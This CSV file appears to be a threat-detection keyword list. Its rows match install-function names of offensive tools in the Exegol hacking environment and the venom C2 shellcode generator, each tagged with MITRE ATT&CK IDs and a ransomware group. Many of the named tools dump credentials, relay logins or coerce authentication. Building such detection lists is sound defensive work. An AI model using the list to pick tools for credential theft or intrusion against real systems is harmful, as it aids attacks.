"*install_bloodhound-import*",".{0,1000}install_bloodhound\-import.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48642"
"*install_bloodhound-py*",".{0,1000}install_bloodhound\-py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48643"
"*install_bloodhound-quickwin*",".{0,1000}install_bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48644"
"*install_certipy*",".{0,1000}install_certipy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48645"
"*install_certsync*",".{0,1000}install_certsync.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48646"
"*install_coercer*",".{0,1000}install_coercer.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48647"
"*install_crackhound*",".{0,1000}install_crackhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48648"
"*install_cracking_apt_tools*",".{0,1000}install_cracking_apt_tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48649"
"*install_crackmapexec*",".{0,1000}install_crackmapexec.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48650"
"*install_cypheroth*",".{0,1000}install_cypheroth.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48651"
"*install_darkarmour*",".{0,1000}install_darkarmour.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48652"
"*install_dfscoerce*",".{0,1000}install_dfscoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48653"
"*install_donpapi*",".{0,1000}install_donpapi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48654"
"*install_enum4linux-ng*",".{0,1000}install_enum4linux\-ng.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48655"
"*install_enyx*",".{0,1000}install_enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48656"
"*install_evilwinrm*",".{0,1000}install_evilwinrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48657"
"*install_finduncommonshares*",".{0,1000}install_finduncommonshares.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48658"
"*install_gmsadumper*",".{0,1000}install_gmsadumper.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48659"
"*install_goldencopy*",".{0,1000}install_goldencopy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48660"
"*install_gosecretsdump*",".{0,1000}install_gosecretsdump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48661"
"*install_gpp-decrypt*",".{0,1000}install_gpp\-decrypt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48662"
"*install_hashonymize*",".{0,1000}install_hashonymize.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48663"
"*install_impacket*",".{0,1000}install_impacket.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48664"
"*install_keepwn*",".{0,1000}install_keepwn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48665"
"*install_kerbrute*",".{0,1000}install_kerbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48666"
"*install_krbrelayx*",".{0,1000}install_krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48667"
"*install_ldapdomaindump*",".{0,1000}install_ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48668"
"*install_ldaprelayscan*",".{0,1000}install_ldaprelayscan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48669"
"*install_ldapsearch-ad*",".{0,1000}install_ldapsearch\-ad.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48670"
"*install_lnkup*",".{0,1000}install_lnkup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48671"
"*install_lsassy*",".{0,1000}install_lsassy.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48672"
"*install_manspider*",".{0,1000}install_manspider.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48673"
"*install_mitm6_pip*",".{0,1000}install_mitm6_pip.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48674"
"*install_noPac*",".{0,1000}install_noPac.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48675"
"*install_ntlmv1-multi*",".{0,1000}install_ntlmv1\-multi.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48676"
"*install_oaburl*",".{0,1000}install_oaburl.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48677"
"*install_PassTheCert*",".{0,1000}install_PassTheCert.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48678"
"*install_pcredz*",".{0,1000}install_pcredz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48679"
"*install_petitpotam*",".{0,1000}install_petitpotam.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48680"
"*install_pkinittools*",".{0,1000}install_pkinittools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48681"
"*install_polenum*",".{0,1000}install_polenum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48682"
"*install_privexchange*",".{0,1000}install_privexchange.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48683"
"*install_pth-tools*",".{0,1000}install_pth\-tools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48684"
"*install_pygpoabuse*",".{0,1000}install_pygpoabuse.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48685"
"*install_pykek*",".{0,1000}install_pykek.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48686"
"*install_pylaps*",".{0,1000}install_pylaps.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48687"
"*install_pypykatz*",".{0,1000}install_pypykatz.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48688"
"*install_pywhisker*",".{0,1000}install_pywhisker.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48689"
"*install_pywsus*",".{0,1000}install_pywsus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48690"
"*install_responder*",".{0,1000}install_responder.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48691"
"*install_roastinthemiddle*",".{0,1000}install_roastinthemiddle.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48692"
"*install_ruler*",".{0,1000}install_ruler.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48693"
"*install_rusthound*",".{0,1000}install_rusthound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48694"
"*install_shadowcoerce*",".{0,1000}install_shadowcoerce.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48695"
"*install_smartbrute*",".{0,1000}install_smartbrute.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48696"
"*install_smbmap*",".{0,1000}install_smbmap.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48697"
"*install_smtp-user-enum*",".{0,1000}install_smtp\-user\-enum.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48698"
"*install_sprayhound*",".{0,1000}install_sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48699"
"*install_targetedKerberoast*",".{0,1000}install_targetedKerberoast.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48700"
"*install_webclientservicescanner*",".{0,1000}install_webclientservicescanner.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48701"
"*install_windapsearch-go*",".{0,1000}install_windapsearch\-go.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","48702"
"*install_winrar_wine32.exe*",".{0,1000}install_winrar_wine32\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48703"
"*install_winrar_wine64.*",".{0,1000}install_winrar_wine64\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","48704"
